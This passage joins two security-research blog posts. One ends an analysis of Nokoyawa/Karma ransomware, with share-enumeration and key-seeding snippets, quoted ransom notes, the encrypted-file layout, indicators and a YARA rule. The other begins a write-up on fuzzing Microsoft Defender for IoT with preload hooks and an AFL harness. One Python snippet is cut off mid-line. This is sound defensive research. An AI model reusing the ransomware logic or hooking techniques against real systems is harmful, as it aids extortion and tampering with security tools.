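    if (WNetOpenEnumW(RESOURCE_GLOBALNET, RESOURCETYPE_DISK, 0, root, &hEnum) != NO_ERROR)
        return;

    DWORD bufSize = 16 * 1024;
    NETRESOURCEW* buf = (NETRESOURCEW*)LocalAlloc(LPTR, bufSize);
    for (;;) {
        DWORD count = (DWORD)-1, size = bufSize;
        if (WNetEnumResourceW(hEnum, &count, buf, &size) != NO_ERROR) break;
        for (DWORD i = 0; i < count; i++) {
            if (buf[i].dwUsage & RESOURCEUSAGE_CONTAINER)
                EnumShares(&buf[i]);                       // descend into containers (domains, servers)
            else if (buf[i].lpRemoteName)
                wprintf(L"share: %s\n", buf[i].lpRemoteName);
        }
    }
    LocalFree(buf);
    WNetCloseEnum(hEnum);   // matches the third API called by the ransomware
}

int main() {
    EnumShares(NULL);   // NULL = start at the root of the network
    return 0;
}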

There are no significant similarities between the ransom notes except the use of email addresses as contact points. Karma variants embedded an .onion link that also appeared in the Karma ransom note. We did not find any .onion links in Nokoyawa's code or ransom note.

The Nokoyawa ransom note:

Dear usernamme, your files were encrypted, some are compromised.
Be sure, you can't restore it without our help.
You need a private key that only we have.
Contact us to reach an agreement or we will leak your black shit to media:

[email protected]
[email protected]

亲爱的用户名,您的文件已加密,有些已被泄露。
请确保,如果没有我们的帮助,您将无法恢复它。
您需要一个只有我们拥有的私钥。
联系我们以达成协议,否则我们会将您的黑屎泄露给媒体:

[email protected]
[email protected]

The Karma ransom note:

Your network has been breached by Karma ransomware group.
We have extracted valuable or sensitive data from your network and encrypted the data on your systems.
Decryption is only possible with a private key that only we posses.
Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.
Scamming is just bad for business in this line of work.
Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.
We advise you not to use any data recovery tools without leaving copies of the initial encrypted file.
You are risking irreversibly damaging the file by doing this.

If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.

http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/

If a ransom is payed we will provide the decryption key and proof that we deleted you data.
When you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.

How to contact us:
[email protected]
[email protected]
[email protected]

The ransom note filename uses a similar format as the previous versions: <ransom_extension>_<note_name>.txt.

Nokoyawa Karma
ransom_extension “NOKOYAWA” “KARMA” & “KARMA_V2”
note_name “_readme.txt” “-ENCRYPTED.txt”

The <ransom_extension> string has been used for many different functions, including:

  • file extension of encrypted files
  • appended as data to an encrypted file
  • ransom note filename part
  • mutex (the NOKOYAWA variant is observed to not make use of Mutexes)
  • to denote files to be excluded from further processing (e.g., to avoid running in a loop)

Nokoyawa’s Flawed Encryption Routine

During file and folder enumeration, the new variant creates a hash of the enumerated folder name and compares it to the hashes of excluded folders. However, this custom hashing algorithm appears to be flawed: it neither seems logical nor appears to work as expected.

Below is a Python representation of the hashing algorithm.

def nokoyawa_dir_hashing(folder):
    folder_len = len(folder)
    # to unicode
    folder = '\x00'.join([c for c in folder])
    # initial hash value
    nhash = 0x1505
    i = 0
    while i 

The implementation of this flawed hashing algorithm in some cases results in excluding multiple folders. Logically, one would expect there to be a 1:1 correlation between a hash and the folder to be excluded. However, the flawed code effectively makes it possible for multiple folders to be excluded based on a single hash. This code does not appear in Karma variants, which instead contain hardcoded strings denoting which folders to ignore during encryption.

The following table shows which folders the developers intended to skip during encryption.

Hash Folders Intended To Be Excluded
0x11f299b5 program files
0x78fb3995 program files (x86)
0x7c80b426 appdata
0x7c8cc47c windows
0xc27bb715 programdata
0xd6f02889 $recycle.bin

For extensions, the ransomware doesn't use a hashing algorithm; it compares raw strings against the extracted file extension. The excluded extensions are .exe, .dll, and .lnk. Files containing "NOKOYAWA" are also excluded.

Both Nokoyawa and Karma variants dynamically load bcrypt.dll and call BCryptGenRandom in order to generate 0x20 random bytes. They generate an ephemeral Sect233r1 key pair using the generated random bytes as the seed. The malware then uses the private ephemeral key and the public embedded key to generate a shared Salsa20 key, which is subsequently used for the file encryption. The Salsa20 nonce is hardcoded as “lvcelvce” in Nokoyawa, whereas in the Karma version it was "11111111".
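
The seed generation step corresponds to only a couple of API calls. The sketch below mirrors the dynamic resolution of bcrypt.dll described above; the elliptic-curve and Salsa20 steps, which the ransomware implements with its own embedded code, are omitted, and this is our illustration rather than the malware's code.

#include <windows.h>
#include <cstdio>

// Matches the BCryptGenRandom prototype so bcrypt.dll can be resolved at runtime.
typedef LONG(WINAPI* BCryptGenRandom_t)(PVOID hAlgorithm, PUCHAR pbBuffer,
                                        ULONG cbBuffer, ULONG dwFlags);
#ifndef BCRYPT_USE_SYSTEM_PREFERRED_RNG
#define BCRYPT_USE_SYSTEM_PREFERRED_RNG 0x00000002
#endif

int main() {
    HMODULE bcrypt = LoadLibraryW(L"bcrypt.dll");
    if (!bcrypt) return 1;
    BCryptGenRandom_t pGenRandom =
        (BCryptGenRandom_t)GetProcAddress(bcrypt, "BCryptGenRandom");
    if (!pGenRandom) return 1;

    unsigned char seed[0x20];   // the 0x20 random bytes used to seed the ephemeral key pair
    if (pGenRandom(NULL, seed, sizeof(seed), BCRYPT_USE_SYSTEM_PREFERRED_RNG) != 0)
        return 1;

    for (unsigned char b : seed) printf("%02x", b);
    printf("\n");
    return 0;
}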

An I/O completion packet is sent to the thread responsible for encryption. The packet includes the following:

  • File handle
  • File size
  • File data
  • Salsa20 key
  • Salsa nonce
  • public ephemeral key

The encryption thread has a switch containing four cases, as follows:

  • Case 1: Writes encrypted content and decryption struct to file and appends "extension"/"variant name".
  • Case 2: Calculates validation SHA1 hash and encrypts file data with Salsa20.
  • Case 3: Closes File Handle and moves files with the new extension.
  • Case 4: Exits.

In both variants, the initial switch case is "2".

Initial case, encryption thread
Encryption thread case handler

During Case 2, the malware adds a SHA1 checksum, which is possibly validated during the decryption phase. The method runs through the following logic:

  • Allocates 0x13 bytes (0x14 required for SHA1)
  • XORs Salsa key with a buffer of "6".
  • Concatenates file data to XORed Salsa key
  • Calculates SHA1.
  • XORs Salsa key with a buffer of "\".
  • Concatenates SHA1 hash to the second XORed Salsa key.
  • Calculates validation SHA1.
  • Validation SHA1 hash first 0x13 bytes are added to the encrypted file struct

Files encrypted by Nokoyawa will have the following structure.

struct nokoyawa_encrypted_file
{
    BYTE  encrypted_file_data[file_size],  // using salsa20
    BYTE  public_ephemeral_key[0x40],  // Sect233r1
    BYTE  validation_hash[0x13],  // last byte is chopped
    STRING ransomware_extension
}

The private key required for decryption is held by the attacker. When it is made available to the victim, the decryption routine reads the struct, extracts the public ephemeral key, and regenerates the Salsa20 key using the private key. The encrypted data is then decrypted with that key and validated by recomputing the validation hash.

Conclusion

Nokoyawa's code similarity and structure suggest that it is an evolution of the previous Nemty strain, Karma. This appears to be another attempt by the developer to confuse attribution. At this time, the actor does not appear to maintain or provide an onion leak page.

SentinelLabs could not validate previous research suggesting Nokoyawa is related to Hive. Given the lack of code similarities between the two and the lack of further correlating data, we can only suggest that earlier researchers' findings may be explained by the possibility of an affiliate using both Hive and Nokoyawa.

SentinelLabs continues to follow and analyze the development of Nemty ransomware variants.

Indicators of Compromise

Karma Ransomware SHA1

960fae8b8451399eb80dd7babcc449c0229ee395

Nokoyawa Ransomware SHA1

2904358f825b6eb6b750e13de43da9852c9a9d91
2d92468b5982fbbb39776030fab6ac35c4a9b889
32c2ecf9703aec725034ab4a8a4c7b2944c1f0b7

Nokoyawa Ransom Note Email Addresses

[email protected]
[email protected]
[email protected]
[email protected]

Nokoyawa YARA Rule

rule Nokoyawa_Nemty
{
    meta:  
        author = "@Tera0017"
        description = "Nokoyawa, Nemty/Karma ransomware variant"    
        Reference = "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/"
    
    strings:
        $code1 = {B8 (41| 43) 00 00 00 [10-30] 83 F8 5A}
        $code2 = {48 8B 4C 24 08 F0 0F C1 01 03 44 24 10}      
        $code3 = {83 E8 20 88 [7] 48 C1 E0 05 48 03 44 24}
        $code4 = {48 C7 44 24 ?? 05 15 00 00}
        $string1 = "RGVhciB1c2VybmFtbWUsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0ZWQsIHNvbWUgY" ascii
        $string2 = "-network" fullword wide
        $string3 = "-help" fullword wide
        $winapi1 = "PostQueuedCompletionStatus" fullword ascii
        $winapi2 = "GetSystemInfo" fullword ascii
        $winapi3 = "WNetEnumResourceW" fullword ascii
        $winapi4 = "GetCommandLineW" fullword ascii
        $winapi5 = "BCryptGenRandom" fullword ascii
        
    condition:
        all of ($winapi*) and 4 of ($code*, $string*)
}

✇SentinelLabs

Inside the Black Box | How We Fuzzed Microsoft Defender for IoT and Found Multiple Vulnerabilities

By: Kasif Dekel

Introduction

Following on from our post on multiple vulnerabilities in Microsoft Azure Defender for IoT, this post discusses the techniques and infrastructure we used in our vulnerability research. In particular, we focus on the fuzzing infrastructure we developed in order to fuzz the DPI mechanism.

We explore the intricacies of developing an advanced fuzzer and describe our methods along with some of the challenges we met and overcame in the process. We hope that this will be of value to other researchers and contribute to the overall aim of improving product security in the enterprise.

In order to understand the context of what follows, readers are encouraged to review our previous post on the vulnerabilities we discovered and reported in Azure Defender for IoT.

Overview of Network Dissectors in the Horizon-Parser

Deep packet inspection (DPI) in Microsoft Azure Defender For IoT is achieved via the horizon component, which is responsible for analyzing network traffic. The horizon component loads built-in dissectors and can be extended to add custom network protocol dissectors.

The DPI infrastructure consists of two docker images that run on the sensor machine, Traffic-Monitor and Horizon-Parser.

The horizon-parser container is responsible for analyzing the traffic, extracting the appropriate fields, and alerting if anomalies occur. This is the mechanism we will focus on, since it is where the DPI takes place.

Let’s begin by taking a look at an overview of the horizon architecture:

Source: MSDN

The main binary that the horizon-parser executes is the horizon daemon, which is responsible for the entire DPI process. In its initialization phase, this binary loads dissectors: shared libraries that implement network protocol parsers.

To fuzz the network dissectors effectively, we rely on binary instrumentation and an injected library that extends AFL to facilitate fast fuzzing. While Microsoft had left some binaries partially unstripped, containing only the function names, the vast majority of this research had to be performed "black box". In addition, we had to compile a lot of dependency libraries and load their symbols into IDA to make the research easier.

Microsoft has released some limited information about how to implement a custom dissector. According to this information, a dissector is implemented via the following C++ interface:

#include "plugin/plugin.h"
namespace {
 class CyberxHorizonSDK: public horizon::protocol::BaseParser {
  public:
   std::vector<uint64_t> processDissectAs(const std::map<std::string, std::vector<uint64_t>> &filters) const override {
     return std::vector<uint64_t>();
   }
   horizon::protocol::ParserResult processLayer(horizon::protocol::management::IProcessingUtils &ctx,
                                                horizon::general::IDataBuffer &data) override {
     return horizon::protocol::ParserResult();
   }
 };
}
 
extern "C" {
  std::shared_ptr<horizon::protocol::BaseParser> create_parser() {
    return std::make_shared<CyberxHorizonSDK>();
  }
}
  • processDissectAs – Called when a new plugin is loaded with a map containing the structure of dissect_as, as defined in a JSON configuration file.
  • processLayer – The main function of the dissector. Everything related to packet processing should be done here. Each time a new packet is being routed to the dissector, this function will be called.
  • create_parser – Called when the dissector is loaded, used by the horizon binary in order to recognize and register the dissector. In addition, it is responsible for an early bootstrapping of the dissector.

A dissector is built in a layered configuration, meaning that each dissector is responsible for one layer and then the horizon service is responsible for passing the outcome to the next layer in the chain:

Source: MSDN

A dissector consists of a JSON configuration file, the binary file itself, and other metadata. Understanding the JSON configuration file is not necessary to follow the rest of the post, but it’ll give you the look and feel of the system.

Below is an example of the JSON configuration file for the FTP dissector.

{
  "id": "FTP",
  "override_id": 38,
  "library": "ftp",
  "endianess": "big",
  "backward_compatability": true,
  "metadata": {
    "is_distributed_control_system": false,
    "has_protocol_address": false,
    "is_scada_protocol": false,
    "is_router_potenial": false
  },
  "sanity_failure_codes": {
    "Not enough data": 1,
    "no result identified": 2
  },
  "malformed_codes": {
    "End of line not found": 2,
    "Wrong ports": 3,
    "No token found": 4,
<redacted>
  },
  "exports_dissect_as": {},
  "dissect_as": {
    "TCP": {
      "port": ["21"]
    }
  },
  "fields": [
    {
      "id": "response_code",
      "type": "numeric"
    },
<redacted>
    {
      "id": "firmware",
      "type": "array:complex",
      "fields": [
        {
          "id": "fwid",
          "type": "string"
        },
        {
          "id": "device_id",
          "type": "string"
        }
      ]
    }
  ]
}

Below is a list of the pre-installed dissectors that come with Azure Defender For IoT sensor machine.

Our task is to fuzz processLayer, as this is the routine that is responsible for actually parsing packet data. However, fuzzing stateful network services is not a simple task in any circumstances; fuzzing it on a black box target only adds to the complexity.

Fuzzing Dissectors with E9AFL

After some testing and experimentation, we chose AFL for fuzzing the dissectors, but we had to help it a little and provide coverage feedback to actually enable it to efficiently fuzz our targets.

To overcome the lack of source code, we used E9AFL with minor changes to fit our goals. E9AFL is an open source binary-level instrumentation project that relies on e9patch, a powerful static binary rewriting tool for x86_64 Linux ELF binaries. Interested readers can dive more into the background of E9AFL here.

We begin our instrumentation with E9AFL using the following commands.

./e9afl readelf
mkdir -p input
mkdir -p output
head -n 1 `which ls` > input/exe
afl-fuzz -m none -i input/ -o output/ -- ./readelf.afl -a @@

For our target, we needed to make some adjustments. For the sake of speed as well as other reasons that will be explained further below, we wanted to control the fork server initialization phase. We also wanted to accurately choose an initialization spot for the binary fuzzing to start. Given these requirements, we chose to modify the init function in the inserted instrumentation by commenting out the fork server initialization. As will be explained below, we implement this initialization manually later.

At this point, it is probably worth reminding readers that, to improve performance, afl-fuzz uses a “fork server”, where the fuzzed process goes through execve(), linking, and libc initialization only once, and is then cloned from a stopped process image by leveraging copy-on-write. The implementation is described in more detail here.

The point where we chose to start the fork server is a little before the entry point of processLayer on the invoked target dissector. However, in order to do so and also support generic fuzzing for every dissector, we needed to reverse engineer the horizon binary to understand the internal structures that are passed between these routines.

Unfortunately, this turned out to be a very tedious task since the code is very large, highly complex, and written in modern C++. In addition, the horizon binary implements a framework for handling network traffic data.

Instead of spending time reversing all the structures and relevant code, we came up with another idea and built a special harness. We let the horizon binary run, then stopped it at a strategic location where all the structures had been populated and were ready to use, modified the appropriate fields to insert a test case, and continued execution with the fork server.

This meant that we did not need the entire structures passed to processLayer; some can be left untyped as we only relay those pointers (e.g., Dissection Context).

typedef void* (*process_layer_t)(void* parser_result, void* base_parser, void* dissection_context, data_buffer_t* data_buffer);

The data_buffer_t struct, which contains the packet data, needs to be modified for each execution of the fuzzee to feed new test cases to the fuzzer.

typedef struct __attribute__((packed)) __attribute__((aligned(4))) data_buffer
{
    void* _vftbl;
<redacted>
    unsigned long long cursor;
    unsigned long long data_len;
    unsigned long long total_data_len;
    void* data_ptr;
    void* data_ptr_end;
    void* curr_data_ptr;
    int field_80;
} data_buffer_t;

Let’s consider a brief flowchart of the fuzzing process.

We use AFL_PRELOAD or LD_PRELOAD (depending on the execution) to inject our fuzzer helper library into the fuzzee and set up a fuzzing-ready environment.

The first code that runs in the library is the run() function, which is sort of a shared library entry point:

__attribute__((constructor)) int run() {
    char* current_path = realpath("/proc/self/exe", NULL);
 
    if (strstr(current_path, HORIZON_PATH) == 0) {
        return -1;
    }
 
    should_hook = 1;
    return 0;
}

As shown, it checks whether the main module is horizon and if it is, it enables the hooks by setting should_hook to true.

Since this library is injected in the early stages of process creation, we have to set a temporary hook on a function which, in turn, will set the hook on the real target function. The following function was chosen by reverse engineering: we found that it is called by horizon in later stages of execution, but before the packet processing actually starts.

	int (*setsockopt_orig)(int sockfd, int level, int optname, const void* optval, socklen_t optlen);
int setsockopt(int sockfd, int level, int optname, const void* optval, socklen_t optlen) {
    if (!setsockopt_orig) setsockopt_orig = dlsym(RTLD_NEXT, "setsockopt");
    if (done_hooking || !should_hook) {
        return setsockopt_orig(sockfd, level, optname, optval, optlen);
    }
    done_hooking = 1;
    hooker();
 
    return setsockopt_orig(sockfd, level, optname, optval, optlen);
}

We need this two-stage approach because our library is loaded before the process is fully mapped. The setsockopt hook calls the hooker function, shown below.

int hooker() {
    horizon_baseaddr = get_lib_addr("horizon") + INSTRUMENTED_OFFSET;
 
    printf("horizon_baseaddress %p aligned: %p offset: %x\n", horizon_baseaddr, horizon_baseaddr + (CALL_PROCESS_HOOK_OFFSET & 0xff000), (CALL_PROCESS_HOOK_OFFSET & 0xff000));
    int ret_val = mprotect(horizon_baseaddr + (CALL_PROCESS_HOOK_OFFSET & 0xff000), 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
 
    <redacted>
 
    addr_to_returnto = (unsigned long long)(((char*)horizon_baseaddr) + (CALL_PROCESS_HOOK_OFFSET + 13));
    void* dest = horizon_baseaddr + CALL_PROCESS_HOOK_OFFSET;
 
    // Assemble a 13-byte patch at the hook site: mov r11, <trampoline> ; jmp r11
    jump_struct_t jump_struct;
    jump_struct.moveopcode[0] = 0x49;  // REX.W + B prefix
    jump_struct.moveopcode[1] = 0xbb;  // mov r11, imm64
    jump_struct.address = (unsigned long long) trampoline;
    jump_struct.pushorjump[0] = 0x41;  // jmp r11
    jump_struct.pushorjump[1] = 0xff;
    jump_struct.pushorjump[2] = 0xe3;

    memcpy(dest, &jump_struct, sizeof(jump_struct_t));
}

The INSTRUMENTED_OFFSET is an offset added to the main module by E9AFL. CALL_PROCESS_HOOK_OFFSET is the offset of our target code, which the trampoline hooks; it sits right before the point where processLayer is invoked.

The code above is only executed when a packet arrives; thus, we send a dummy packet to the target fuzzee.
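
As an illustration, the dummy packet can be as simple as a single DNS query emitted onto the monitored segment (a minimal sketch; the destination address is an assumption and only needs to be a host whose traffic is mirrored to the sensor). For the TCP build of the hook, any HTTP request crossing the monitored segment serves the same purpose.

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Emit a single, minimal DNS query for "a." so the passive capture has one
 * UDP/DNS packet to dissect. dst_ip is any host on the mirrored segment. */
int send_dummy_dns(const char *dst_ip) {
    const unsigned char query[] = {
        0x13, 0x37, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* header */
        0x01, 'a', 0x00,                                                        /* QNAME "a" */
        0x00, 0x01, 0x00, 0x01                                                  /* QTYPE A, QCLASS IN */
    };
    struct sockaddr_in addr = {0};
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0)
        return -1;

    addr.sin_family = AF_INET;
    addr.sin_port = htons(53);
    inet_pton(AF_INET, dst_ip, &addr.sin_addr);

    ssize_t sent = sendto(s, query, sizeof(query), 0,
                          (struct sockaddr *)&addr, sizeof(addr));
    close(s);
    return sent == (ssize_t)sizeof(query) ? 0 : -1;
}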

The dissectionContext structure contains the state of the layered packet. For example, an HTTP packet is composed of several layers, including ETHERNET, IPV4, TCP and HTTP, so the dissectionContext will contain information regarding each layer in the chain.

Since reconstructing all relevant structures can be tedious, for our purposes we can use an already populated dissectionContext as we only fuzz one layer at a time.

Let’s next take a look at the trampoline() code.

__attribute__((naked)) void trampoline() {
    __asm__(
        ".intel_syntax;"
        "push %%rax;" //backup rax
        "mov %%eax, [%%rsi+0x10];"
#ifdef IS_UDP
        "cmp %%eax, 0xe23ff64c;" // DNS CONST, for UDP
#else
        "cmp %%eax, 0x3d829631;" // HTTP CONST, for TCP
#endif
        "pop %%rax;" //restore rax
        "jz prepare_fuzzer;"
        "push %%rbp;"
        "push %%rbx;"
        "sub %%rsp, 0x1b8;"
        "mov [%%rsp], %%rdi;"
        "mov %%rdi, %0;"
        "jmp %%rdi;"
        ".att_syntax;"
        :: "p" (addr_to_returnto)
    );
}

The trampoline is responsible for redirecting execution to the prepare_fuzzer function when the proper conditions are met. When our dummy packet is received, the trampoline compares the current layer ID to the HTTP constant. Although we chose HTTP arbitrarily, it could be any Layer 7 protocol that sits on top of TCP. The same goes for UDP, but we use the DNS layer ID instead. If it doesn’t match, we restore the correct program state by manually executing the overwritten instructions and jumping back to the continuation of the hooked function.

Ultimately, we want to achieve a state where the dissectionContext points to a TCP/UDP previousLayer, depending on our target. This means that we only need to change the data buffer to our test case.

In the above scenario, rsi holds a pointer to the dissectionContext, which contains the layer ID at offset 0x10 (pluginId in the screenshot).

When the above conditions are met, our fuzzee reaches the prepare_fuzzer function.

At this point, we want to ensure that this function only gets executed once for each fuzzing instance.

int prepare_fuzzer(void* res, void* dissection_context) {
    if (did_hook_happened) {
        while (true) {
            sleep(1000);
        }
    }
    did_hook_happened = 1;

Notice that the function signature partly matches that of the horizon::protocol::ParserOrchestrator::ParserOrchestratorImpl::callProcess function.

We don’t need the rest of the parameters to be passed in, since we can create them ourselves.

Customizing and Running The Fuzzer

There are about 100 built-in dissectors we want to fuzz. To make our fuzzing process easier, we added a number of generic environment variables that let us change the fuzzing target directly from the command line.

const char* target_fuzzee = getenv("__TARGET_FUZZEE");
    const char* target_path = getenv("__TARGET_FUZZEE_PATH");
    const char* target_symbol = getenv("__TARGET_SYMBOL");
    const char* fuzzfile = getenv("__FUZZFILE");
 
    if (!target_fuzzee || !target_symbol || !target_path || !fuzzfile) {
        printf("Failed to get environment variables target_fuzzee: %s, target_symbol: %s target_path: %s fuzzfile: %s\n", target_fuzzee, target_symbol, target_path, fuzzfile);
        ret_val = -1;
        exit(ret_val);
    }

  • The target_fuzzee variable is used to find our target dissector’s base address in order to look up the necessary symbols (e.g., “libhttp”).
  • The target_path variable (described later) is used for symbol lookup (e.g., “/opt/horizon/lib/horizon/http/libhttp.so”).
  • The target_symbol variable is the symbol of the processLayer routine in our target dissector, for example:
    _ZN12_GLOBAL__N_110HTTPParser12processLayerERN7horizon8protocol10management16IProcessingUtilsERNS1_7general11IDataBufferE
  • The fuzzfile variable is the file that AFL uses to feed the fork server with new test cases.

Next, the lookup for create_parser is done:

void* real_lib_handle = dlopen(target_path, RTLD_NOW);
 
    if (real_lib_handle == NULL) {
        printf("Failed to get library handle\n");
        ret_val = -1;
        exit(ret_val);
    }
 
    printf("lib handle pointer %p\n", real_lib_handle);
    create_parser_addr = dlsym(real_lib_handle, "create_parser");
 
    if (create_parser_addr == NULL) {
        printf("Failed to get create_parser address\n");
        ret_val = -1;
        exit(ret_val);
    }

Then create_parser is called in order to obtain a pluginBase object of the target dissector, which is later passed to processLayer.

    printf("create_parser address %p\n", create_parser_addr);
 
    unsigned long long out = 0;
    void** create_parser_obj = create_parser_addr(&out);
 
    printf("create_parser obj  %p\n", *create_parser_obj);

Afterwards, a number of function pointers are obtained:

  handle_t* horizon_handle = create_module_handle(horizon_baseaddr, HORIZON_PATH);
 
    if (horizon_handle == NULL) {
        printf("horizon_handle is NULL \n");
        ret_val = -1;
        exit(ret_val);
    }
 
    lib_baseaddr = get_lib_addr((char*)target_fuzzee);
    printf("lib_baseaddress %p\n", lib_baseaddr);
    handle_t* lib_handle = create_module_handle(lib_baseaddr, (char*)target_path);
 
    if (lib_handle == NULL) {
        printf("lib_handle is NULL \n");
        ret_val = -1;
        exit(ret_val);
    }
 
    data_buffer_construct_ptr = lookup_symbol(horizon_handle, "_ZN7horizon7general10DataBufferC2Ev");
    printf("data_buffer_addr: %p\n", data_buffer_construct_ptr);
 
    process_layer_t process_layer_ptr = (process_layer_t)lookup_symbol(lib_handle, target_symbol);

The create_module_handle function maps the specified file into memory and is used to find a function’s address from its symbol name. This is required because the processLayer routines are local symbols (note the anonymous-namespace mangling), and dlopen/dlsym only see the dynamic symbol table.
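
To illustrate, a minimal version of such a lookup could look as follows (an assumed reconstruction rather than the harness code): map the shared object from disk, walk its .symtab, which dlsym cannot see, and add the matching symbol’s st_value to the module’s load base.

#include <elf.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Resolve a (possibly local) symbol by parsing .symtab of the on-disk ELF and
 * rebasing st_value onto the module's load address obtained at runtime. */
void *lookup_local_symbol(const char *path, void *module_base, const char *name) {
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return NULL;

    struct stat st;
    if (fstat(fd, &st) < 0) {
        close(fd);
        return NULL;
    }

    unsigned char *file = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (file == MAP_FAILED)
        return NULL;

    Elf64_Ehdr *ehdr = (Elf64_Ehdr *)file;
    Elf64_Shdr *shdrs = (Elf64_Shdr *)(file + ehdr->e_shoff);
    void *result = NULL;

    for (int i = 0; i < ehdr->e_shnum && !result; i++) {
        if (shdrs[i].sh_type != SHT_SYMTAB)
            continue;
        Elf64_Sym *syms = (Elf64_Sym *)(file + shdrs[i].sh_offset);
        const char *strtab = (const char *)(file + shdrs[shdrs[i].sh_link].sh_offset);
        size_t count = shdrs[i].sh_size / sizeof(Elf64_Sym);

        for (size_t j = 0; j < count; j++) {
            if (syms[j].st_name && strcmp(strtab + syms[j].st_name, name) == 0) {
                result = (char *)module_base + syms[j].st_value;  /* runtime address */
                break;
            }
        }
    }

    munmap(file, st.st_size);
    return result;
}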

Next, we look up a pointer to the horizon::general::DataBuffer::DataBuffer constructor, which initialises the data buffer object for us, and then we populate the appropriate fields to point it at our test case. This is performed by create_data_buffer, which is used later in the code:

data_buffer_t* create_data_buffer(unsigned char* buffer, unsigned int len) {
    printf("data buffer size: %ld\n", sizeof(data_buffer_t));
    data_buffer_t* data_buffer = malloc(sizeof(data_buffer_t));
 
    if (data_buffer == NULL) {
        printf("Failed to allocate data buffer\n");
        return NULL;
    }
 
    data_buffer_construct_ptr(data_buffer);
 
    data_buffer->cursor = 0;
    data_buffer->data_len = len;
    data_buffer->total_data_len = len;
    data_buffer->data_ptr = buffer;
    data_buffer->data_ptr_end = &buffer[len];
    data_buffer->curr_data_ptr = buffer;
 
    return data_buffer;
}

We map AFL’s coverage bitmap and start the fork server. Next, we read the test case data from the specified file. Finally, we create the data buffer with the test case and call the processLayer function.

	    __afl_map_shm();
    __afl_start_forkserver();
    //special point
    FILE* f = fopen(fuzzfile, "rb");
    if (f) {
        fseek(f, 0, SEEK_END);
        length = ftell(f);
        fseek(f, 0, SEEK_SET);
        fuzzbuffer = malloc(length);
        if (fuzzbuffer) {
            fread(fuzzbuffer, 1, length, f);
        }
        fclose(f);
    }
 
    if (fuzzbuffer) {
        data_buffer_t* buffer = create_data_buffer((unsigned char*)fuzzbuffer, length);
        process_layer_ptr(parser_result, *create_parser_obj, dissection_context, buffer);
    }
 
    _exit(0); // we only fuzz one dissector at a time

Every time the fuzzer executes a new test case, the execution continues from the “special point” as marked above.

To execute the fuzzer, we used the following command:

AFL_PRELOAD=/tmp/fuzzer/libloader.so __TARGET_FUZZEE=libsnmp __TARGET_FUZZEE_PATH=/opt/horizon/lib/horizon/snmp/libsnmp.so __TARGET_SYMBOL=_ZN12_GLOBAL__N_19SNMParser12processLayerERN7horizon8protocol10management16IProcessingUtilsERNS1_7general11IDataBufferE __FUZZFILE=/tmp/fuzzer/dissectors/libsnmp/fuzzfile.txt afl-fuzz -i /tmp/fuzzer/dissectors/libsnmp/in -o /tmp/fuzzer/dissectors/libsnmp/out -f /tmp/fuzzer/dissectors/libsnmp/fuzzfile.txt -m 100000 -M libsnmpmaster /opt/horizon/bin/horizon.instrumented

When we tested our fuzzer, we experienced several stability issues.

The fuzzer reported non-reproducible crashes, and stability sometimes dropped to 0.1%. This happened because horizon had several threads doing polling, which generated non-deterministic behaviour. To fix this issue, we had to block the polling before the fork server started, so we introduced the following hook.

int (*poll_orig)(struct pollfd* fds, nfds_t nfds, int timeout);
int poll(struct pollfd* fds, nfds_t nfds, int timeout) {
    if (!poll_orig)
        poll_orig = dlsym(RTLD_NEXT, "poll");
    if (should_end_poll) {
        pause();
    }
 
    return poll_orig(fds, nfds, timeout);
}

Right before starting the fork server, we set should_end_poll to true, which blocks this API.

   should_end_poll = 1;
    sleep(1);
 
    __afl_map_shm();
    __afl_start_forkserver();

This fixed the issue and raised stability to above 99.5%.

The latest version of the loader can be found here.

Enhancing the Fuzzer’s Efficiency

We had done some fuzzing at this point, but we wanted to use our machines’ resources more efficiently. However, we could not run two fuzzing instances simultaneously on the same machine, because horizon listens on several sockets, which prevents additional instances from running.

We addressed this problem in two different ways. The first solution simply closes all the relevant sockets before starting the fork server:

void closesockets() {
    int i = 0;
    struct stat st;
    // The loop body was truncated in the original post; a plausible reconstruction
    // walks the descriptor table and closes only the sockets, so that the ports
    // horizon listens on are released before the fork server starts.
    for (i = 3; i < 1024; i++) {
        if (fstat(i, &st) == 0 && S_ISSOCK(st.st_mode)) {
            close(i);
        }
    }
}

The second approach eliminates the need to actually send a packet to horizon. We found that the horizon service can be used in two modes:

  • Live packet capture - When used, horizon will capture packets from a port mirror. This is the default configuration mode, rcdcap.
  • Offline mode (PCAP) - In this mode, horizon will load a PCAP file from the disk and replay the traffic.

The processing mode is selected in horizon’s configuration file, which by default looks as follows:

horizon.stats.interval=5
horizon.logger.stats=/var/cyberx/logs/horizon.stats.log
horizon.logger.default=/var/cyberx/logs/horizon.log
horizon.logger.format=%Y-%m-%d %H:%M:%S,%i %p [%P - %I] - %t
horizon.processor.type=live
horizon.processor.filter=
horizon.processor.workers=1
 
<redacted>

By reverse engineering the horizon binary, we figured out that we could change the processor type to “file” and have it load a PCAP file as mentioned above.

This eventually made the configuration file look like this:

horizon.stats.interval=5
horizon.logger.stats=/var/cyberx/logs/horizon.stats.log
horizon.logger.default=/var/cyberx/logs/horizon.log
horizon.logger.format=%Y-%m-%d %H:%M:%S,%i %p [%P - %I] - %t
horizon.processor.type=file
horizon.processor.filter=
horizon.processor.workers=1
horizon.processor.file.path=/tmp/fuzzer/traffic.pcap
horizon.processor.afpacket.caplen=4096
horizon.processor.afpacket.blocks=5
 
<redacted>

All of these enhancements enabled us to run numerous fuzzing instances in parallel.

At this point, we created a Telegram bot to report fuzzing progress, control per-test-case coverage collection, and retrieve files from the fuzzer.

Checking Results and Finding Vulnerabilities

